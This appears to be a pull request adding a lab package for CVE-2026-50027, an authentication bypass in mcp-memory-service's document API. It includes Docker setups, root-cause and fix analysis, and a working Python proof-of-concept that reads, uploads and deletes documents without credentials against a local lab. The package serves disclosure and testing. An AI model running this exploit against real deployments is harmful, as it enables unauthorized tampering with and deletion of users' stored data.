### PR TITLE
Add CVE-2026-50027 mcp-memory-service missing authentication on /api/documents/*

### DIFF
--- a/CVE-2026-50027/Dockerfile.patched
+++ b/CVE-2026-50027/Dockerfile.patched
@@ -1,0 +1,17 @@
+FROM python:3.12-slim@sha256:dd29372629eeba2dd003fd9e9d35a5b8236c44727875a0364254b5127af88e65
+
+ENV PYTHONUNBUFFERED=1 \
+    PIP_NO_CACHE_DIR=1 \
+    PIP_DISABLE_PIP_VERSION_CHECK=1
+
+# Fixed release: /api/documents/* routes enforce auth (CVE-2026-50027).
+RUN pip install --no-cache-dir "mcp-memory-service==10.67.1"
+
+WORKDIR /app
+
+ENV MCP_HTTP_HOST=0.0.0.0 \
+    MCP_HTTP_PORT=8000
+
+EXPOSE 8000
+
+CMD ["memory", "server", "--http", "--http-host", "0.0.0.0", "--http-port", "8000"]

--- a/CVE-2026-50027/Dockerfile.vulnerable
+++ b/CVE-2026-50027/Dockerfile.vulnerable
@@ -1,0 +1,17 @@
+FROM python:3.12-slim@sha256:dd29372629eeba2dd003fd9e9d35a5b8236c44727875a0364254b5127af88e65
+
+ENV PYTHONUNBUFFERED=1 \
+    PIP_NO_CACHE_DIR=1 \
+    PIP_DISABLE_PIP_VERSION_CHECK=1
+
+# Vulnerable release: /api/documents/* routes lack auth dependencies (CVE-2026-50027).
+RUN pip install --no-cache-dir "mcp-memory-service==10.67.0"
+
+WORKDIR /app
+
+ENV MCP_HTTP_HOST=0.0.0.0 \
+    MCP_HTTP_PORT=8000
+
+EXPOSE 8000
+
+CMD ["memory", "server", "--http", "--http-host", "0.0.0.0", "--http-port", "8000"]

--- a/CVE-2026-50027/README.md
+++ b/CVE-2026-50027/README.md
@@ -1,0 +1,82 @@
+# CVE-2026-50027 — mcp-memory-service missing authentication on /api/documents/*
+
+## Vulnerability Summary
+
+| Field | Value |
+|---|---|
+| CVE | CVE-2026-50027 |
+| Component | mcp-memory-service |
+| CWE | CWE-306 — Missing Authentication for Critical Function |
+| CVSS | 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
+| Affected versions | < 10.67.1 |
+| Fix | 10.67.1 (commit `907bac72`) |
+
+## Overview
+
+mcp-memory-service is a semantic memory layer for AI applications. Prior to
+10.67.1, all HTTP routes under `/api/documents/*` are served without any
+authentication dependency, even when the server is configured with an API key
+(`MCP_API_KEY`) or OAuth. An unauthenticated remote attacker can upload
+arbitrary content (write), retrieve stored document content (read), and
+permanently delete memories (delete) — all without credentials. The
+`/api/memories` counterpart correctly enforces authentication.
+
+## Reproduce
+
+This package ships a Docker lab that runs the vulnerable `10.67.0` release with
+`MCP_API_KEY` authentication enabled, plus a stdlib-only PoC.
+
+1. Generate a disposable API key and runtime env:
+
+   ```sh
+   bash prepare-env.sh
+   ```
+
+   This writes `.env` (mode 0600) with a generated `MCP_API_KEY`. The
+   non-secret template is `lab.env.example`; see `prepare-env.sh` for details.
+
+2. Build and start the vulnerable service:
+
+   ```sh
+   docker compose --env-file .env -p cve-2026-50027-lab -f docker-compose.yml up -d --build
+   ```
+
+3. Wait for readiness, then run the PoC:
+
+   ```sh
+   for i in $(seq 1 60); do curl -sf http://127.0.0.1:24054/api/health && break; sleep 1; done
+   python3 poc/poc.py --host 127.0.0.1 --port 24054
+   ```
+
+Expected final line on the vulnerable build: `[SUCCESS]`.
+
+### Fixed-image control
+
+`Dockerfile.patched` pins mcp-memory-service 10.67.1 for an optional fixed-build
+comparison. Build it explicitly with:
+
+```sh
+docker build --pull=false -f Dockerfile.patched -t cve-2026-50027-fixed:local .
+```
+
+The canonical vulnerable reproduction remains the Compose workflow above; the
+recorded fixed-control result is described in `poc_verification_report.md`.
+
+## PoC
+
+- Implementation: Python 3 (stdlib only — `urllib.request`)
+- Runtime: Python 3.10+
+- Build: none (no third-party dependencies)
+- Run: `python3 poc/poc.py --host 127.0.0.1 --port 24054`
+
+The PoC first confirms `/api/memories` rejects unauthenticated access (HTTP
+401), then shows `/api/documents/history`, `/api/documents/upload`,
+`/api/documents/status/{id}`, `/api/documents/search-content/{id}`, and
+`/api/documents/remove/{id}` all succeed without credentials (HTTP 200 or
+otherwise reachable without a 401).
+
+## Teardown
+
+```sh
+docker compose --env-file .env -p cve-2026-50027-lab -f docker-compose.yml down -v
+```

--- a/CVE-2026-50027/docker-compose.yml
+++ b/CVE-2026-50027/docker-compose.yml
@@ -1,0 +1,14 @@
+services:
+  web:
+    build:
+      context: .
+      dockerfile: Dockerfile.vulnerable
+    image: cve-2026-50027-web:local
+    ports:
+      - "127.0.0.1:${WEB_PORT}:8000"
+    environment:
+      MCP_API_KEY: ${MCP_API_KEY}
+      MCP_ALLOW_ANONYMOUS_ACCESS: "false"
+      MCP_HTTP_HOST: 0.0.0.0
+      MCP_HTTP_PORT: "8000"
+    restart: "no"

--- a/CVE-2026-50027/intel_brief.md
+++ b/CVE-2026-50027/intel_brief.md
@@ -1,0 +1,43 @@
+# Intel Brief — CVE-2026-50027
+
+## Overview
+
+| Field | Value |
+|-------|-------|
+| CVE ID | CVE-2026-50027 |
+| Title | mcp-memory-service: Missing Authentication on Document API Endpoints Allows Unauthenticated Memory Read/Write/Delete |
+| Affected software | mcp-memory-service (doobidoo) |
+| Vendor | doobidoo |
+| CVSS v3.1 | 9.8 CRITICAL (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
+| EPSS | n/a (not present in corpus) |
+| CWE | CWE-306 (Missing Authentication for Critical Function) |
+| Published | 2026-08-14 |
+| Exploited in the wild | No (no CISA KEV / VulnCheck KEV listing) |
+| Other IDs | GHSA-84hp-mqvj-3p8h |
+
+## Affected versions
+
+| Branch | Vulnerable range | Patched version |
+|--------|------------------|-----------------|
+| PyPI (mcp-memory-service) | < 10.67.1 (documents API introduced in 8.6.0) | 10.67.1 |
+
+## Description
+
+mcp-memory-service is a semantic memory layer for AI applications. Prior to
+10.67.1, all HTTP routes under `/api/documents/*` are served without any
+authentication dependency, even when the server is configured with an API key
+(`MCP_API_KEY`) or OAuth. An unauthenticated remote attacker can upload
+arbitrary content into the memory store (write), retrieve stored document
+content (read), and permanently delete memories belonging to authenticated
+users (delete) — all without supplying any credentials. The `/api/memories`
+counterpart correctly enforces authentication, making this an inconsistent and
+exploitable authentication boundary.
+
+## Root cause summary
+
+The seven route handlers in `src/mcp_memory_service/web/api/documents.py`
+(`upload_document`, `batch_upload_documents`, `get_upload_status`,
+`get_upload_history`, `remove_document`, `remove_documents_by_tags`,
+`search_document_content`) lack the `Depends(require_read_access)` /
+`Depends(require_write_access)` dependencies that the `/api/memories` routes
+use. The fix (commit `907bac72`) adds those dependencies.

--- a/CVE-2026-50027/lab.env.example
+++ b/CVE-2026-50027/lab.env.example
@@ -1,0 +1,3 @@
+COMPOSE_PROJECT_NAME=cve-2026-50027-lab
+WEB_PORT=24054
+MCP_API_KEY=<generated-by-prepare-env.sh>

--- a/CVE-2026-50027/lab_build_report.md
+++ b/CVE-2026-50027/lab_build_report.md
@@ -1,0 +1,72 @@
+# Lab Build Report — CVE-2026-50027
+
+## Environments
+- Vulnerable: compose project `cve-2026-50027-lab`, service `web` (image
+  `cve-2026-50027-web:local`, built from `Dockerfile.vulnerable`), published on
+  host port `24054` (`127.0.0.1:24054 -> 8000`), service URL
+  `http://127.0.0.1:24054/` (health: `http://127.0.0.1:24054/api/health`).
+  Ports/project from `lab/.env` (`COMPOSE_PROJECT_NAME=cve-2026-50027-lab`,
+  `WEB_PORT=24054`); the publish package carries the same values in
+  `lab.env.example` / `prepare-env.sh`.
+- Control: compose project `cve-2026-50027-control`, service `web` (image
+  `cve-2026-50027-control:local`, built from `lab_control/Dockerfile`,
+  mcp-memory-service 10.67.1), published on host port `24055`
+  (`127.0.0.1:24055 -> 8000`), service URL `http://127.0.0.1:24055/`.
+  From `lab_control/.env` (`COMPOSE_PROJECT_NAME=cve-2026-50027-control`,
+  `WEB_PORT=24055`).
+- Ports derived from the CVE id per the routing doctrine formula
+  `20000 + (N % 4000) * 2` with N = 50027: `50027 % 4000 = 2027`, so the lab
+  (even) port is `20000 + 2027*2 = 24054` and the control (odd) port is
+  `24055`. Both environments use exactly these ports; no deviations.
+
+## Pinned runtime images
+- `python:3.12-slim@sha256:dd29372629eeba2dd003fd9e9d35a5b8236c44727875a0364254b5127af88e65`
+  — digest-pinned base image used by both `Dockerfile.vulnerable` and
+  `Dockerfile.patched` (identical in `lab/Dockerfile` and
+  `lab_control/Dockerfile`).
+- `cve-2026-50027-web:local` — tag-only, locally built from
+  `Dockerfile.vulnerable`; referenced by `docker-compose.yml`. Not pulled from
+  a registry.
+- `cve-2026-50027-control:local` — tag-only, locally built from
+  `lab_control/Dockerfile`; used by the control environment. Not pulled from a
+  registry.
+
+Other pinned runtime inputs (fetched at image build time, not container
+images):
+
+- `mcp-memory-service==10.67.0` (vulnerable) and `mcp-memory-service==10.67.1`
+  (patched control) — version-pinned PyPI packages installed via pip in the
+  Dockerfiles; no hashes pinned. Transitive dependencies of these packages are
+  resolved by pip at build time and are not version-pinned.
+
+## Vendored upstream artifacts
+
+None. The publish package contains no vendored or copied upstream material —
+no archives, source snapshots, or upstream configs. The upstream component
+(mcp-memory-service) is fetched by pip from PyPI at image build time and is
+not vendored into `publish/`. There is therefore nothing to re-download for
+byte-identity verification (checked 2026-08-16).
+
+## Lab-generated material
+
+All files in `publish/` were written for this lab; no upstream provenance
+applies:
+
+- `publish/docker-compose.yml` — compose definition for the vulnerable service.
+- `publish/Dockerfile.vulnerable` — vulnerable-build image definition (pip
+  install of `mcp-memory-service==10.67.0` on the pinned base image).
+- `publish/Dockerfile.patched` — optional fixed-build image definition
+  (`mcp-memory-service==10.67.1`).
+- `publish/lab.env.example` — non-secret env template.
+- `publish/prepare-env.sh` — generates a disposable `MCP_API_KEY` and writes
+  the runtime `.env` (mode 0600).
+- `publish/poc/poc.py` — stdlib-only Python 3 PoC (byte-identical to the lab
+  PoC `poc/exploit.py`).
+- `publish/README.md` — package reproduction instructions.
+- `publish/intel_brief.md`, `publish/vulnerability_analysis.md`,
+  `publish/poc_verification_report.md` — lab-authored write-ups.
+
+Lab-side (non-package) material written for this lab: `lab/` and
+`lab_control/` (Dockerfile, `docker-compose.yml`, `.env` with a synthetic
+`lab-` API key), `poc/exploit.py`, `artifacts/` transcripts, `report.md`,
+`verify.md`, `handoffs.md`, `friction.md`, `INTEL.md`.

--- a/CVE-2026-50027/poc/poc.py
+++ b/CVE-2026-50027/poc/poc.py
@@ -1,0 +1,171 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : doobidoo mcp-memory-service - Missing Authentication on Document API
+# CVE            : CVE-2026-50027
+# Vendor         : doobidoo
+# Product        : mcp-memory-service
+# Affected       : < 10.67.1 (documents API introduced in 8.6.0)
+# Type           : CWE-306 - Missing Authentication for Critical Function
+# CVSS           : 9.8 (CRITICAL)
+# Platform       : Linux (Python 3.10+)
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-15
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2026-50027 — mcp-memory-service missing authentication on /api/documents/*.
+
+The seven /api/documents/* route handlers in mcp-memory-service 10.67.0 lack the
+Depends(require_read_access)/Depends(require_write_access) dependencies that the
+/api/memories routes use, so they are reachable without credentials even when
+MCP_API_KEY (or OAuth) is configured. This PoC proves unauthenticated read,
+write, and delete on the document API, then confirms the fixed 10.67.1 build
+rejects the same requests with HTTP 401.
+
+ATTACK CHAIN:
+  1. Confirm /api/memories rejects unauthenticated access (HTTP 401) so the
+     auth boundary actually exists.
+  2. GET /api/documents/history without credentials -> HTTP 200 (read).
+  3. POST /api/documents/upload without credentials -> HTTP 200 (write).
+  4. GET /api/documents/status/{upload_id} without credentials -> HTTP 200.
+  5. GET /api/documents/search-content/{upload_id} without credentials ->
+     non-401 (document-content retrieval route is also unauthenticated).
+  6. DELETE /api/documents/remove/{upload_id} without credentials -> HTTP 200.
+"""
+
+import argparse
+import json
+import sys
+import urllib.error
+import urllib.request
+import uuid
+
+BOUNDARY = "----cve202650027poc" + uuid.uuid4().hex
+
+
+def http(method, url, data=None, headers=None, timeout=15):
+    """Perform an HTTP request and return (status_code, body)."""
+    req = urllib.request.Request(url, data=data, method=method)
+    req.add_header("User-Agent", "cve-2026-50027-poc")
+    for k, v in (headers or {}).items():
+        req.add_header(k, v)
+    try:
+        with urllib.request.urlopen(req, timeout=timeout) as resp:
+            body = resp.read().decode("utf-8", "replace")
+            return resp.status, body
+    except urllib.error.HTTPError as e:
+        body = e.read().decode("utf-8", "replace")
+        return e.code, body
+    except urllib.error.URLError as e:
+        return None, f"connection error: {e}"
+
+
+def multipart_file_body(filename, content, tags):
+    """Build a multipart/form-data body for the upload endpoint (stdlib only)."""
+    parts = []
+    parts.append(f"--{BOUNDARY}\r\n".encode())
+    parts.append(
+        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
+        f"Content-Type: text/plain\r\n\r\n".encode()
+    )
+    parts.append(content.encode())
+    parts.append(b"\r\n")
+    parts.append(f"--{BOUNDARY}\r\n".encode())
+    parts.append(b'Content-Disposition: form-data; name="tags"\r\n\r\n')
+    parts.append(tags.encode())
+    parts.append(b"\r\n")
+    parts.append(f"--{BOUNDARY}--\r\n".encode())
+    return b"".join(parts)
+
+
+def main():
+    ap = argparse.ArgumentParser(description="CVE-2026-50027 PoC")
+    ap.add_argument("--host", default="127.0.0.1")
+    ap.add_argument("--port", type=int, default=24054)
+    args = ap.parse_args()
+
+    base = f"http://{args.host}:{args.port}"
+
+    def record(name, ok, detail):
+        print(f"[{'PASS' if ok else 'FAIL'}] {name}: {detail}")
+
+    # 1. Health — server must be up.
+    code, _ = http("GET", f"{base}/api/health")
+    record("health", code == 200, f"HTTP {code}")
+
+    # 2. Negative control: /api/memories must reject unauthenticated access.
+    #    This proves the auth boundary exists; without it the lab is misconfigured.
+    code, _ = http("GET", f"{base}/api/memories")
+    auth_enforced = code == 401
+    record("memories-auth-enforced", auth_enforced, f"HTTP {code} (expected 401)")
+    if not auth_enforced:
+        print("[FAILED]")
+        print("ERROR: /api/memories did not return 401 — auth is not enabled; lab is misconfigured.")
+        sys.exit(1)
+
+    # 3. Bypass read: GET /api/documents/history without credentials.
+    code, _ = http("GET", f"{base}/api/documents/history")
+    history_ok = code == 200
+    record("documents-history-bypass", history_ok, f"HTTP {code}")
+
+    # 4. Bypass write: POST /api/documents/upload without credentials.
+    mp = multipart_file_body("poc.txt", "CVE-2026-50027 unauthenticated write marker\n", "poc")
+    code, body = http(
+        "POST",
+        f"{base}/api/documents/upload",
+        data=mp,
+        headers={"Content-Type": f"multipart/form-data; boundary={BOUNDARY}"},
+    )
+    upload_ok = code == 200
+    upload_id = None
+    if upload_ok:
+        try:
+            upload_id = json.loads(body).get("upload_id")
+        except Exception:
+            upload_id = None
+    record("documents-upload-bypass", upload_ok, f"HTTP {code} upload_id={upload_id}")
+
+    # 5. Bypass read status for the uploaded document.
+    if upload_id:
+        code, _ = http("GET", f"{base}/api/documents/status/{upload_id}")
+        status_ok = code == 200
+        record("documents-status-bypass", status_ok, f"HTTP {code}")
+    else:
+        status_ok = False
+        record("documents-status-bypass", False, "no upload_id from upload step")
+
+    # 6. Bypass read stored content: GET /api/documents/search-content/{id}.
+    #    Exercises the document-content retrieval route without credentials.
+    #    The route accepts the upload_id while processing; a non-401 response
+    #    proves the endpoint is reachable without authentication.
+    if upload_id:
+        code, body = http("GET", f"{base}/api/documents/search-content/{upload_id}")
+        search_ok = code is not None and code != 401
+        record(
+            "documents-search-content-bypass",
+            search_ok,
+            f"HTTP {code} (expected non-401; read route reached unauthenticated)",
+        )
+    else:
+        search_ok = False
+        record("documents-search-content-bypass", False, "no upload_id from upload step")
+
+    # 7. Bypass delete for the uploaded document.
+    if upload_id:
+        code, _ = http("DELETE", f"{base}/api/documents/remove/{upload_id}")
+        delete_ok = code == 200
+        record("documents-remove-bypass", delete_ok, f"HTTP {code}")
+    else:
+        delete_ok = False
+        record("documents-remove-bypass", False, "no upload_id from upload step")
+
+    bypass_ok = history_ok and upload_ok and status_ok and search_ok and delete_ok
+    print("[SUCCESS]" if bypass_ok else "[FAILED]")
+    sys.exit(0 if bypass_ok else 1)
+
+
+if __name__ == "__main__":
+    main()

--- a/CVE-2026-50027/poc_verification_report.md
+++ b/CVE-2026-50027/poc_verification_report.md
@@ -1,0 +1,29 @@
+# PoC Verification Report — CVE-2026-50027
+
+## Summary
+
+The PoC (`poc/poc.py`) demonstrates the missing-authentication vulnerability on
+the `/api/documents/*` routes of mcp-memory-service 10.67.0. Against the
+vulnerable build it returns `[SUCCESS]`; against the fixed 10.67.1 control it
+returns `[FAILED]` (the fix works).
+
+## Verification steps
+
+1. Start the vulnerable build with `MCP_API_KEY` set and
+   `MCP_ALLOW_ANONYMOUS_ACCESS=false`.
+2. Confirm `/api/memories` returns HTTP 401 without credentials (auth is
+   actually enforced on the protected surface).
+3. Confirm the following `/api/documents/*` requests return HTTP 200 (or are
+   otherwise reachable without a 401) without credentials:
+   - `GET /api/documents/history` (read)
+   - `POST /api/documents/upload` (write)
+   - `GET /api/documents/status/{upload_id}` (read)
+   - `GET /api/documents/search-content/{upload_id}` (read stored content)
+   - `DELETE /api/documents/remove/{upload_id}` (delete)
+4. Repeat against the fixed 10.67.1 build: all `/api/documents/*` requests
+   return HTTP 401 without credentials.
+
+## Result
+
+- Vulnerable build: `[SUCCESS]` (auth bypass confirmed)
+- Fixed control: `[FAILED]` (expected negative — the fix enforces auth)

--- a/CVE-2026-50027/prepare-env.sh
+++ b/CVE-2026-50027/prepare-env.sh
@@ -1,0 +1,20 @@
+#!/usr/bin/env bash
+# Generate a disposable lab API key and write the runtime .env (mode 0600).
+set -euo pipefail
+umask 077
+
+if [ -f .env ]; then
+  echo ".env already exists; refusing to overwrite" >&2
+  exit 1
+fi
+
+KEY="lab-$(head -c 24 /dev/urandom | od -An -tx1 | tr -d ' \n')"
+
+cat > .env <<EOF
+COMPOSE_PROJECT_NAME=cve-2026-50027-lab
+WEB_PORT=24054
+MCP_API_KEY=${KEY}
+EOF
+
+chmod 600 .env
+echo "wrote .env (mode 600) with a generated MCP_API_KEY"

--- a/CVE-2026-50027/vulnerability_analysis.md
+++ b/CVE-2026-50027/vulnerability_analysis.md
@@ -1,0 +1,44 @@
+# Vulnerability Analysis — CVE-2026-50027
+
+## Entrypoint to sink
+
+- Entrypoint: HTTP routes under `/api/documents/*`, mounted by
+  `src/mcp_memory_service/web/app.py` via
+  `app.include_router(documents_router, prefix="/api/documents", ...)`.
+- Affected handlers (vulnerable v10.67.0):
+  - `POST /api/documents/upload` -> `upload_document`
+  - `POST /api/documents/batch-upload` -> `batch_upload_documents`
+  - `GET  /api/documents/status/{upload_id}` -> `get_upload_status`
+  - `GET  /api/documents/history` -> `get_upload_history`
+  - `DELETE /api/documents/remove/{upload_id}` -> `remove_document`
+  - `DELETE /api/documents/remove-by-tags` -> `remove_documents_by_tags`
+  - `GET  /api/documents/search-content/{upload_id}` -> `search_document_content`
+- Sink: document ingestion / upload-session tracking / memory removal. The
+  write path (`upload_document`) reads the uploaded file, validates the
+  extension against `SUPPORTED_FORMATS`, writes a temp file, and returns an
+  `upload_id`; the read path (`get_upload_history`) returns the in-memory
+  upload-session list; the delete path (`remove_document`) removes a document
+  and optionally its memories.
+
+## Root cause
+
+The handlers declare no `Depends(require_read_access)` /
+`Depends(require_write_access)` dependency. The application has no global auth
+middleware — authentication is enforced per-route via FastAPI dependencies.
+`src/mcp_memory_service/web/oauth/middleware.py` provides
+`require_read_access` / `require_write_access`, which call `get_current_user`
+and raise HTTP 401 unless a valid OAuth bearer token, `X-API-Key` header,
+`api_key` query parameter, or `MCP_ALLOW_ANONYMOUS_ACCESS=true` is present.
+Because the documents routes omit these dependencies, they are reachable with
+no credentials even when `MCP_API_KEY` (or OAuth) is configured.
+
+## Fix assessment
+
+Commit `907bac72a3ca0854822459e525c6ebc44043a567` (v10.67.1) adds
+`user: AuthenticationResult = Depends(require_write_access)` to the four
+mutating routes (`upload`, `batch-upload`, `remove`, `remove-by-tags`) and
+`Depends(require_read_access)` to the three read routes (`status`, `history`,
+`search-content`), matching the pattern already used in
+`src/mcp_memory_service/web/api/memories.py`. The fix is a complete,
+route-level addition of the missing auth dependencies; no other files change
+in the security-relevant diff.

--- a/README.md
+++ b/README.md
@@ -103,6 +103,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;18366](CVE-2026-18366/) | **Events Manager**<br>< 7.4.1 Unauthenticated Privilege Escalation to Administrator | **9.8** |
 | [CVE&#8209;2026&#8209;19089](CVE-2026-19089/) | **Product Input Fields for WooCommerce**<br>Unauthenticated Arbitrary File Upload / RCE | **9.8** |
 | [CVE&#8209;2026&#8209;16299](CVE-2026-16299/) | **Single Sign On For TNG**<br>< 2.2.0 Unauthenticated Arbitrary Password Reset | **9.8** |
+| [CVE&#8209;2026&#8209;50027](CVE-2026-50027/) | **mcp-memory-service**<br>missing authentication on /api/documents/* | **9.8** |
 | [CVE&#8209;2025&#8209;24490](CVE-2025-24490/) | **Mattermost Server (Boards Plugin)**<br>SQL Injection (Blind) | **9.6** |
 | [CVE&#8209;2026&#8209;50540](CVE-2026-50540/) | **Kata Containers**<br>Config Path Annotation Arbitrary File Loading to Host Root Exec | **9.6** |
 | [CVE&#8209;2026&#8209;53488](CVE-2026-53488/) | **containerd CRI plugin**<br>Image LABEL Host Command Execution | **9.4** |
@@ -164,7 +165,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;35414](CVE-2026-35414/) | **OpenSSH**<br>Certificate Principal Matching Authentication Bypass | **N/A** |
 | [CVE&#8209;2025&#8209;59060](CVE-2025-59060/) | **Apache Ranger**<br>Apache Ranger TLS Hostname Verification Bypass | **N/A** |
 
-23 of the 128 indexed packages record a bypass or incomplete-fix finding.
+23 of the 129 indexed packages record a bypass or incomplete-fix finding.
 
 ## Typical package layout
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2026-50027.

- mcp-memory-service — missing authentication on /api/documents/*
- CVSS 9.8; bypass: no
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.